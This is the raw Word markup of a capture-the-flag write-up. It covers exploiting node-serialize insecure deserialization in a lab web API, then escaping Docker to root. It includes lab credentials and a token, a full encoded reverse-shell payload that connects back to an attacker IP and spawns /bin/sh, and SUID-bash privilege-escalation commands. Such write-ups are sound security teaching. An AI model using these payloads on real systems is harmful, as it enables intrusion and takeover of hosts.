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BUFFERED</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itco2wf91x3n"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kwv6v7obsqb5"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97100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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6gwmmvw1dg0"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RCPBIND</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19200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="89"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have a message telling us to add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x-access-token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the header and use the following token →</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6eyJpcyI6MiwibmFtZSI6ImRldmVsb3BlciJ9LCJpYXQiOjE2MTU2NjQ4MDIsImV4cCI6MTYxNTY2NjAwMn0.E7_riIcQclXhqpHO4on8bQ-xggAbKsHYUbn-ozJFIgc</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access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/clients</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, or we can send a POST request to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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the following credentials →</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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{"user": "developer", "password": "z2pYo28GjL4l"}</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intercept the request using Burp Suite and add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x-access-token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the header using the provided token, then try to access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/clients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7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the token is invalid. So we move to the second option: send a POST request to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/login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using the provided credentials.</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6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with the credentials, we receive a new token. We will use this new token to access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/clients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93"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making the request with the new token, we notice something interesting in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">next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“you can filter the result using the search parameter”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85"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passing a string to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search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we receive an error message. Apparently, it is trying to deserialize our string using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unserialize()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function. Therefore, we may be dealing with an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insecure deserialization attack in Node.js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Untrusted data passed into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unserialize()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">node-serialize</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript object containing an Immediately Invoked Function Expression (IIFE).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payload described in the following reference:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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Exploiting Node.js deserialization bug for Remote Code Execution</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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29000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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know we can exploit the function in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">node-serialize</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module if untrusted data is passed to it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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pf37r4y6cjq0" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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tog3oupahxv0" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nodejsshell.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to generate a reverse shell payload.</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7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generate the serialized payload and add IIFE parentheses after the function body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{"rce":"_$$ND_FUNC$$_function (){payload}()"}</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complete payload looks like this:</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{"rce":"_$$ND_FUNC$$_function ()</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{eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10</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,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115</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,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,48,46,49,52,46,51,34,59,10,80,79,82,84,61,34,52,52,5</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1,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,10</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3,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,1</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01,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,</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61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,10</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 nodejsshell.py</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1,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,4</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4,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111</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,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83</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,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,9</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7,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,1</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05,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,4</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6,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,4</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6,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,10</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5,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,1</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17,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,</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101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,</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32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32</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,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,</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40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44</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,80,79,82,84,41,59,10))}()"}</w:t>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057400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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now send our payload in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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Note: Use URL-encode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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33700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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7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1bwy8xx4kaj7" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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6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successfully retrieve our first flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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t5ytdo6scn4b" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>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235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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sg63ijprubg4" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dock3r Esc4p3 - ROOT - Unintended</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verified, we are inside a Docker container. Inside </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find a mounted filesystem named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onlytest</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we can locate a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.ssh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory containing an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa</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key.</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82"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problem is that the key is encrypted.</w:t>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14600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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Instead of wasting time trying to crack the key, we can generate our own SSH key pair and add our public key to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, thus gaining access to the host.</w:t>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5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46200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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14500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="90"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inspecting the public key already present on the host, we can identify the username → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uhc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81"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set the correct permissions for our private key and connect to the server.</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87"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root directory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retrieve our second flag =)</w:t>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92"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nptoqriwg3bm" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>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thing that caught my attention is that whatever was done inside Docker is also being replicated on the host.</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2900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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escalate privileges simply by copying the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash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 to our home directory. From inside Docker, we set the SUID bit and change the owner of the binary to root using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chown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83"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Docker:</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cp /bin/bash /mnt/home/uhc/</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+s bash</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chown root:root bash</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2717800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="86"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on the host, we execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./bash -p </w:t>
      </w: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-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag makes it run with the owner’s permissions.)</w:t>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16100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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read the final flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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6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d1w4b73k8too" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Intended</w:t>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Return to libc on modern 32 bit and 64 bit Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://ret2rop.blogspot.com/2018/08/return-to-libc.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.youtube.com/watch?v=Ps3mZWQz01s&amp;list=PLIfZMtpPYFP4MaQhy_iR8uM0mJEs7P7s3</w:t>
        </w:r>
